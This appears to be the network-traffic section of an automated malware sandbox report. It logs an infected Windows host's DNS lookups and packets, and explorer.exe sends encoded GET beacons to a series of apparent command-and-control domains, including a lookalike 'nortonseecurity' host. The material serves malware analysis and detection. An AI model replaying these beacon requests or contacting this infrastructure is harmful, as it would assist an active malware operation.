                                                    Jan 30, 2023 13:41:43.313981056 CET8049747208.91.197.27192.168.2.6
                                                    Jan 30, 2023 13:41:48.209919930 CET4974880192.168.2.6156.227.6.30
                                                    Jan 30, 2023 13:41:48.490870953 CET8049748156.227.6.30192.168.2.6
                                                    Jan 30, 2023 13:41:48.491157055 CET4974880192.168.2.6156.227.6.30
                                                    Jan 30, 2023 13:41:48.491260052 CET4974880192.168.2.6156.227.6.30
                                                    Jan 30, 2023 13:41:48.771648884 CET8049748156.227.6.30192.168.2.6
                                                    Jan 30, 2023 13:41:48.772491932 CET8049748156.227.6.30192.168.2.6
                                                    Jan 30, 2023 13:41:48.772536993 CET8049748156.227.6.30192.168.2.6
                                                    Jan 30, 2023 13:41:48.772614956 CET4974880192.168.2.6156.227.6.30
                                                    Jan 30, 2023 13:41:50.036634922 CET4974880192.168.2.6156.227.6.30
                                                    Jan 30, 2023 13:41:51.059873104 CET4974980192.168.2.6156.227.6.30
                                                    Jan 30, 2023 13:41:51.356420040 CET8049749156.227.6.30192.168.2.6
                                                    Jan 30, 2023 13:41:51.356558084 CET4974980192.168.2.6156.227.6.30
                                                    Jan 30, 2023 13:41:51.356923103 CET4974980192.168.2.6156.227.6.30
                                                    Jan 30, 2023 13:41:51.634082079 CET8049749156.227.6.30192.168.2.6
                                                    Jan 30, 2023 13:41:51.634735107 CET8049749156.227.6.30192.168.2.6
                                                    Jan 30, 2023 13:41:51.634767056 CET8049749156.227.6.30192.168.2.6
                                                    Jan 30, 2023 13:41:51.634898901 CET4974980192.168.2.6156.227.6.30
                                                    Jan 30, 2023 13:41:52.908108950 CET4974980192.168.2.6156.227.6.30
                                                    Jan 30, 2023 13:41:55.034912109 CET4975080192.168.2.6156.227.6.30
                                                    Jan 30, 2023 13:41:55.317488909 CET8049750156.227.6.30192.168.2.6
                                                    Jan 30, 2023 13:41:55.317596912 CET4975080192.168.2.6156.227.6.30
                                                    Jan 30, 2023 13:41:55.318169117 CET4975080192.168.2.6156.227.6.30
                                                    Jan 30, 2023 13:41:55.595316887 CET8049750156.227.6.30192.168.2.6
                                                    Jan 30, 2023 13:41:55.595813036 CET8049750156.227.6.30192.168.2.6
                                                    Jan 30, 2023 13:41:55.595868111 CET8049750156.227.6.30192.168.2.6
                                                    Jan 30, 2023 13:41:55.596018076 CET4975080192.168.2.6156.227.6.30
                                                    Jan 30, 2023 13:41:55.596211910 CET4975080192.168.2.6156.227.6.30
                                                    Jan 30, 2023 13:41:55.877506971 CET8049750156.227.6.30192.168.2.6
                                                    Jan 30, 2023 13:42:00.815970898 CET4975180192.168.2.6173.230.227.171
                                                    Jan 30, 2023 13:42:00.944782972 CET8049751173.230.227.171192.168.2.6
                                                    Jan 30, 2023 13:42:00.944999933 CET4975180192.168.2.6173.230.227.171
                                                    Jan 30, 2023 13:42:00.945188999 CET4975180192.168.2.6173.230.227.171
                                                    Jan 30, 2023 13:42:01.073584080 CET8049751173.230.227.171192.168.2.6
                                                    Jan 30, 2023 13:42:01.085072994 CET8049751173.230.227.171192.168.2.6
                                                    Jan 30, 2023 13:42:01.085105896 CET8049751173.230.227.171192.168.2.6
                                                    Jan 30, 2023 13:42:01.085221052 CET4975180192.168.2.6173.230.227.171
                                                    Jan 30, 2023 13:42:02.459685087 CET4975180192.168.2.6173.230.227.171
                                                    Jan 30, 2023 13:42:03.476310015 CET4975280192.168.2.6173.230.227.171
                                                    Jan 30, 2023 13:42:03.604887009 CET8049752173.230.227.171192.168.2.6
                                                    Jan 30, 2023 13:42:03.605236053 CET4975280192.168.2.6173.230.227.171
                                                    Jan 30, 2023 13:42:03.605473995 CET4975280192.168.2.6173.230.227.171
                                                    Jan 30, 2023 13:42:03.733866930 CET8049752173.230.227.171192.168.2.6
                                                    Jan 30, 2023 13:42:03.745745897 CET8049752173.230.227.171192.168.2.6
                                                    Jan 30, 2023 13:42:03.745784998 CET8049752173.230.227.171192.168.2.6
                                                    Jan 30, 2023 13:42:03.745932102 CET4975280192.168.2.6173.230.227.171
                                                    Jan 30, 2023 13:42:05.116482973 CET4975280192.168.2.6173.230.227.171
                                                    Jan 30, 2023 13:42:06.132503986 CET4975380192.168.2.6173.230.227.171
                                                    Jan 30, 2023 13:42:06.271739006 CET8049753173.230.227.171192.168.2.6
                                                    Jan 30, 2023 13:42:06.273859978 CET4975380192.168.2.6173.230.227.171
                                                    Jan 30, 2023 13:42:06.273947001 CET4975380192.168.2.6173.230.227.171
                                                    Jan 30, 2023 13:42:06.428200960 CET8049753173.230.227.171192.168.2.6
                                                    Jan 30, 2023 13:42:06.428262949 CET8049753173.230.227.171192.168.2.6
                                                    Jan 30, 2023 13:42:06.428303003 CET8049753173.230.227.171192.168.2.6
                                                    Jan 30, 2023 13:42:06.428508043 CET4975380192.168.2.6173.230.227.171
                                                    Jan 30, 2023 13:42:06.428931952 CET4975380192.168.2.6173.230.227.171
                                                    Jan 30, 2023 13:42:06.584322929 CET8049753173.230.227.171192.168.2.6
                                                    Jan 30, 2023 13:42:11.617604971 CET4975480192.168.2.6162.241.2.66
                                                    Jan 30, 2023 13:42:11.758852959 CET8049754162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:11.759056091 CET4975480192.168.2.6162.241.2.66
                                                    Jan 30, 2023 13:42:11.759207010 CET4975480192.168.2.6162.241.2.66
                                                    Jan 30, 2023 13:42:11.898879051 CET8049754162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:12.033816099 CET8049754162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:12.033860922 CET8049754162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:12.033884048 CET8049754162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:12.033907890 CET8049754162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:12.033917904 CET4975480192.168.2.6162.241.2.66
                                                    Jan 30, 2023 13:42:12.033931971 CET8049754162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:12.033955097 CET8049754162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:12.033960104 CET4975480192.168.2.6162.241.2.66
                                                    Jan 30, 2023 13:42:12.033977032 CET8049754162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:12.033996105 CET4975480192.168.2.6162.241.2.66
                                                    Jan 30, 2023 13:42:12.033999920 CET8049754162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:12.034023046 CET8049754162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:12.034039974 CET8049754162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:12.034046888 CET4975480192.168.2.6162.241.2.66
                                                    Jan 30, 2023 13:42:12.034089088 CET4975480192.168.2.6162.241.2.66
                                                    Jan 30, 2023 13:42:13.274490118 CET4975480192.168.2.6162.241.2.66
                                                    Jan 30, 2023 13:42:14.293515921 CET4975580192.168.2.6162.241.2.66
                                                    Jan 30, 2023 13:42:14.433355093 CET8049755162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:14.433545113 CET4975580192.168.2.6162.241.2.66
                                                    Jan 30, 2023 13:42:14.433737040 CET4975580192.168.2.6162.241.2.66
                                                    Jan 30, 2023 13:42:14.575479031 CET8049755162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:14.759850025 CET8049755162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:14.759905100 CET8049755162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:14.759943008 CET8049755162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:14.759974003 CET4975580192.168.2.6162.241.2.66
                                                    Jan 30, 2023 13:42:14.759979010 CET8049755162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:14.760015011 CET8049755162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:14.760026932 CET4975580192.168.2.6162.241.2.66
                                                    Jan 30, 2023 13:42:14.760051966 CET8049755162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:14.760087967 CET8049755162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:14.760118008 CET4975580192.168.2.6162.241.2.66
                                                    Jan 30, 2023 13:42:14.760123014 CET8049755162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:14.760159969 CET8049755162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:14.760171890 CET4975580192.168.2.6162.241.2.66
                                                    Jan 30, 2023 13:42:14.760190010 CET8049755162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:14.760245085 CET4975580192.168.2.6162.241.2.66
                                                    Jan 30, 2023 13:42:15.951463938 CET4975580192.168.2.6162.241.2.66
                                                    Jan 30, 2023 13:42:16.963823080 CET4975680192.168.2.6162.241.2.66
                                                    Jan 30, 2023 13:42:17.102468014 CET8049756162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:17.102650881 CET4975680192.168.2.6162.241.2.66
                                                    Jan 30, 2023 13:42:17.102797985 CET4975680192.168.2.6162.241.2.66
                                                    Jan 30, 2023 13:42:17.241149902 CET8049756162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:17.330441952 CET8049756162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:17.330585003 CET8049756162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:17.330852032 CET4975680192.168.2.6162.241.2.66
                                                    Jan 30, 2023 13:42:17.331212997 CET4975680192.168.2.6162.241.2.66
                                                    Jan 30, 2023 13:42:17.469496012 CET8049756162.241.2.66192.168.2.6
                                                    Jan 30, 2023 13:42:22.393086910 CET4975780192.168.2.681.17.29.148
                                                    Jan 30, 2023 13:42:25.399167061 CET4975780192.168.2.681.17.29.148
                                                    Jan 30, 2023 13:42:25.414779902 CET804975781.17.29.148192.168.2.6
                                                    Jan 30, 2023 13:42:25.414905071 CET4975780192.168.2.681.17.29.148
                                                    Jan 30, 2023 13:42:25.420042992 CET4975780192.168.2.681.17.29.148
                                                    Jan 30, 2023 13:42:25.435480118 CET804975781.17.29.148192.168.2.6
                                                    Jan 30, 2023 13:42:25.441071033 CET804975781.17.29.148192.168.2.6
                                                    Jan 30, 2023 13:42:25.441123009 CET804975781.17.29.148192.168.2.6
                                                    Jan 30, 2023 13:42:25.441250086 CET4975780192.168.2.681.17.29.148
                                                    Jan 30, 2023 13:42:26.931374073 CET4975780192.168.2.681.17.29.148
                                                    Jan 30, 2023 13:42:27.946621895 CET4975980192.168.2.681.17.29.148
                                                    Jan 30, 2023 13:42:27.962286949 CET804975981.17.29.148192.168.2.6
                                                    Jan 30, 2023 13:42:27.962393999 CET4975980192.168.2.681.17.29.148
                                                    Jan 30, 2023 13:42:27.962644100 CET4975980192.168.2.681.17.29.148
                                                    Jan 30, 2023 13:42:27.978195906 CET804975981.17.29.148192.168.2.6
                                                    Jan 30, 2023 13:42:27.983197927 CET804975981.17.29.148192.168.2.6
                                                    Jan 30, 2023 13:42:27.983261108 CET804975981.17.29.148192.168.2.6
                                                    Jan 30, 2023 13:42:27.983321905 CET4975980192.168.2.681.17.29.148
                                                    Jan 30, 2023 13:42:29.477781057 CET4975980192.168.2.681.17.29.148
                                                    Jan 30, 2023 13:42:30.494062901 CET4976080192.168.2.681.17.29.148
                                                    Jan 30, 2023 13:42:30.509700060 CET804976081.17.29.148192.168.2.6
                                                    Jan 30, 2023 13:42:30.509869099 CET4976080192.168.2.681.17.29.148
                                                    Jan 30, 2023 13:42:30.510034084 CET4976080192.168.2.681.17.29.148
                                                    Jan 30, 2023 13:42:30.525401115 CET804976081.17.29.148192.168.2.6
                                                    Jan 30, 2023 13:42:30.531753063 CET804976081.17.29.148192.168.2.6
                                                    Jan 30, 2023 13:42:30.531778097 CET804976081.17.29.148192.168.2.6
                                                    Jan 30, 2023 13:42:30.531991959 CET4976080192.168.2.681.17.29.148
                                                    Jan 30, 2023 13:42:30.532217979 CET4976080192.168.2.681.17.29.148
                                                    Jan 30, 2023 13:42:30.547626972 CET804976081.17.29.148192.168.2.6
                                                    Jan 30, 2023 13:42:35.575630903 CET4976180192.168.2.646.28.105.2
                                                    Jan 30, 2023 13:42:38.588001013 CET4976180192.168.2.646.28.105.2
                                                    Jan 30, 2023 13:42:44.588259935 CET4976180192.168.2.646.28.105.2

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 30, 2023 13:39:21.716500044 CET4944853192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:39:21.735779047 CET53494488.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:39:57.493810892 CET6386353192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:39:57.537978888 CET53638638.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:40:07.652533054 CET6253853192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:40:08.650507927 CET6253853192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:40:09.672707081 CET53625388.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:40:09.675578117 CET53625388.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:40:09.688786983 CET6253853192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:40:10.713218927 CET53625388.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:40:10.803862095 CET5490353192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:40:11.825630903 CET53549038.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:40:13.439301968 CET5153053192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:40:14.434750080 CET5153053192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:40:14.463134050 CET53515308.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:40:15.458636999 CET53515308.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:40:19.481553078 CET5612253192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:40:19.791681051 CET53561228.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:40:30.733732939 CET6160953192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:40:30.761029959 CET53616098.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:40:41.648562908 CET5248153192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:40:41.674397945 CET53524818.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:40:52.582340956 CET5608653192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:40:52.698882103 CET53560868.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:41:04.136297941 CET5654753192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:41:04.160065889 CET53565478.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:41:14.567718029 CET5988153192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:41:14.589167118 CET53598818.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:41:24.856324911 CET5034353192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:41:25.514851093 CET53503438.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:41:36.453315020 CET6252053192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:41:36.583319902 CET53625208.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:41:48.187325954 CET5562953192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:41:48.208570957 CET53556298.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:42:00.644042015 CET5207953192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:42:00.805746078 CET53520798.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:42:11.471903086 CET5656953192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:42:11.616022110 CET53565698.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:42:22.355145931 CET6183353192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:42:22.387473106 CET53618338.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:42:35.543114901 CET6003253192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:42:35.570106030 CET53600328.8.8.8192.168.2.6

                                                    ICMP Packets

                                                    TimestampSource IPDest IPChecksumCodeType
                                                    Jan 30, 2023 13:40:10.713422060 CET192.168.2.68.8.8.8cff5(Port unreachable)Destination Unreachable
                                                    Jan 30, 2023 13:40:15.459065914 CET192.168.2.68.8.8.8cff5(Port unreachable)Destination Unreachable

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Jan 30, 2023 13:39:21.716500044 CET192.168.2.68.8.8.80x7b7bStandard query (0)hirosguide.huA (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:39:57.493810892 CET192.168.2.68.8.8.80x5054Standard query (0)www.laylaroseuk.comA (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:40:07.652533054 CET192.168.2.68.8.8.80xa8eaStandard query (0)www.n-r-eng.comA (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:40:08.650507927 CET192.168.2.68.8.8.80xa8eaStandard query (0)www.n-r-eng.comA (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:40:09.688786983 CET192.168.2.68.8.8.80xa8eaStandard query (0)www.n-r-eng.comA (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:40:10.803862095 CET192.168.2.68.8.8.80x3f9fStandard query (0)www.n-r-eng.comA (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:40:13.439301968 CET192.168.2.68.8.8.80xd22dStandard query (0)www.n-r-eng.comA (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:40:14.434750080 CET192.168.2.68.8.8.80xd22dStandard query (0)www.n-r-eng.comA (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:40:19.481553078 CET192.168.2.68.8.8.80x81caStandard query (0)www.sandpiper-apts.comA (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:40:30.733732939 CET192.168.2.68.8.8.80x283bStandard query (0)www.tf8dangky.onlineA (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:40:41.648562908 CET192.168.2.68.8.8.80xac8cStandard query (0)www.teammart.onlineA (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:40:52.582340956 CET192.168.2.68.8.8.80x53a5Standard query (0)www.suachuadienlanh247.comA (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:41:04.136297941 CET192.168.2.68.8.8.80x964aStandard query (0)www.hvlandscapes.bizA (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:41:14.567718029 CET192.168.2.68.8.8.80xd3daStandard query (0)www.frogair.onlineA (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:41:24.856324911 CET192.168.2.68.8.8.80x6a72Standard query (0)www.mitsubangsaen.onlineA (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:41:36.453315020 CET192.168.2.68.8.8.80xba7Standard query (0)www.hayuterce.comA (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:41:48.187325954 CET192.168.2.68.8.8.80x6869Standard query (0)www.wylvxing.comA (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:42:00.644042015 CET192.168.2.68.8.8.80xe140Standard query (0)www.popcors.comA (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:42:11.471903086 CET192.168.2.68.8.8.80xbb18Standard query (0)www.thepromotionhunter.comA (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:42:22.355145931 CET192.168.2.68.8.8.80x3924Standard query (0)www.nortonseecurity.comA (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:42:35.543114901 CET192.168.2.68.8.8.80xee7eStandard query (0)www.nftspaceview.comA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Jan 30, 2023 13:39:21.735779047 CET8.8.8.8192.168.2.60x7b7bNo error (0)hirosguide.hu91.227.138.48A (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:39:57.537978888 CET8.8.8.8192.168.2.60x5054No error (0)www.laylaroseuk.comlaylaroseuk.comCNAME (Canonical name)IN (0x0001)false
                                                    Jan 30, 2023 13:39:57.537978888 CET8.8.8.8192.168.2.60x5054No error (0)laylaroseuk.com2.57.90.16A (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:40:09.672707081 CET8.8.8.8192.168.2.60xa8eaServer failure (2)www.n-r-eng.comnonenoneA (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:40:09.675578117 CET8.8.8.8192.168.2.60xa8eaServer failure (2)www.n-r-eng.comnonenoneA (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:40:10.713218927 CET8.8.8.8192.168.2.60xa8eaServer failure (2)www.n-r-eng.comnonenoneA (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:40:11.825630903 CET8.8.8.8192.168.2.60x3f9fServer failure (2)www.n-r-eng.comnonenoneA (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:40:14.463134050 CET8.8.8.8192.168.2.60xd22dServer failure (2)www.n-r-eng.comnonenoneA (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:40:15.458636999 CET8.8.8.8192.168.2.60xd22dServer failure (2)www.n-r-eng.comnonenoneA (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:40:19.791681051 CET8.8.8.8192.168.2.60x81caNo error (0)www.sandpiper-apts.com164.88.201.214A (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:40:30.761029959 CET8.8.8.8192.168.2.60x283bNo error (0)www.tf8dangky.onlinedns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                    Jan 30, 2023 13:40:30.761029959 CET8.8.8.8192.168.2.60x283bNo error (0)dns.ladipage.comladi-ladipage-dns-nlb-prod-2-33c473f14a5d5c08.elb.ap-southeast-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                    Jan 30, 2023 13:40:30.761029959 CET8.8.8.8192.168.2.60x283bNo error (0)ladi-ladipage-dns-nlb-prod-2-33c473f14a5d5c08.elb.ap-southeast-1.amazonaws.com18.138.206.213A (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:40:41.674397945 CET8.8.8.8192.168.2.60xac8cNo error (0)www.teammart.online184.94.215.91A (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:40:52.698882103 CET8.8.8.8192.168.2.60x53a5No error (0)www.suachuadienlanh247.com103.221.223.104A (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:41:04.160065889 CET8.8.8.8192.168.2.60x964aNo error (0)www.hvlandscapes.bizhvlandscapes.bizCNAME (Canonical name)IN (0x0001)false
                                                    Jan 30, 2023 13:41:04.160065889 CET8.8.8.8192.168.2.60x964aNo error (0)hvlandscapes.biz76.223.105.230A (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:41:04.160065889 CET8.8.8.8192.168.2.60x964aNo error (0)hvlandscapes.biz13.248.243.5A (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:41:14.589167118 CET8.8.8.8192.168.2.60xd3daNo error (0)www.frogair.onlinefrogair.onlineCNAME (Canonical name)IN (0x0001)false
                                                    Jan 30, 2023 13:41:14.589167118 CET8.8.8.8192.168.2.60xd3daNo error (0)frogair.online81.169.145.72A (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:41:25.514851093 CET8.8.8.8192.168.2.60x6a72No error (0)www.mitsubangsaen.onlinecname.u01.df.bkk1.cloud.z.comCNAME (Canonical name)IN (0x0001)false
                                                    Jan 30, 2023 13:41:25.514851093 CET8.8.8.8192.168.2.60x6a72No error (0)cname.u01.df.bkk1.cloud.z.com163.44.198.50A (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:41:36.583319902 CET8.8.8.8192.168.2.60xba7No error (0)www.hayuterce.com208.91.197.27A (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:41:48.208570957 CET8.8.8.8192.168.2.60x6869No error (0)www.wylvxing.com156.227.6.30A (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:42:00.805746078 CET8.8.8.8192.168.2.60xe140No error (0)www.popcors.compopcors.comCNAME (Canonical name)IN (0x0001)false
                                                    Jan 30, 2023 13:42:00.805746078 CET8.8.8.8192.168.2.60xe140No error (0)popcors.com173.230.227.171A (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:42:11.616022110 CET8.8.8.8192.168.2.60xbb18No error (0)www.thepromotionhunter.comthepromotionhunter.comCNAME (Canonical name)IN (0x0001)false
                                                    Jan 30, 2023 13:42:11.616022110 CET8.8.8.8192.168.2.60xbb18No error (0)thepromotionhunter.com162.241.2.66A (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:42:22.387473106 CET8.8.8.8192.168.2.60x3924No error (0)www.nortonseecurity.com81.17.29.148A (IP address)IN (0x0001)false
                                                    Jan 30, 2023 13:42:35.570106030 CET8.8.8.8192.168.2.60xee7eNo error (0)www.nftspaceview.com46.28.105.2A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • hirosguide.hu
                                                    • www.laylaroseuk.com
                                                    • www.sandpiper-apts.com
                                                    • www.tf8dangky.online
                                                    • www.teammart.online
                                                    • www.suachuadienlanh247.com
                                                    • www.hvlandscapes.biz
                                                    • www.frogair.online
                                                    • www.mitsubangsaen.online
                                                    • www.hayuterce.com
                                                    • www.wylvxing.com
                                                    • www.popcors.com
                                                    • www.thepromotionhunter.com
                                                    • www.nortonseecurity.com

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.64971491.227.138.48443C:\Windows\System32\wscript.exe
                                                    TimestampkBytes transferredDirectionData


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1192.168.2.6497192.57.90.1680C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:39:57.586954117 CET749OUTGET /crhz/?vG=1rNCCz7kTcLTieqVkhzplJgcoI94HvPGoNH0lVnmkmFXwmlt9jZmgzPB/kdX+WOK+rGt5Wg7VkzKMCVbaV5wfyZJWCK5Z18H2VF/y4/Kognk&s91Fd8=b8xjX_ HTTP/1.1
                                                    Host: www.laylaroseuk.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 30, 2023 13:39:57.623446941 CET749INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 30 Jan 2023 12:39:57 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    10192.168.2.649731184.94.215.9180C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:40:47.278994083 CET798OUTGET /crhz/?vG=4Z6KAxgBWslvyWQs2zz1LTCSIJZnXz/Wr59nnN1quAvIIyJUwPyWYoHYYm82bfT5dpIzg2ZgrTpqnEgpaKo3IMTbbHn1kxCLU7tvpznsmq41&s91Fd8=b8xjX_ HTTP/1.1
                                                    Host: www.teammart.online
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 30, 2023 13:40:47.556508064 CET799INHTTP/1.1 404 Not Found
                                                    Date: Mon, 30 Jan 2023 12:40:47 GMT
                                                    Server: Apache
                                                    Content-Length: 5278
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
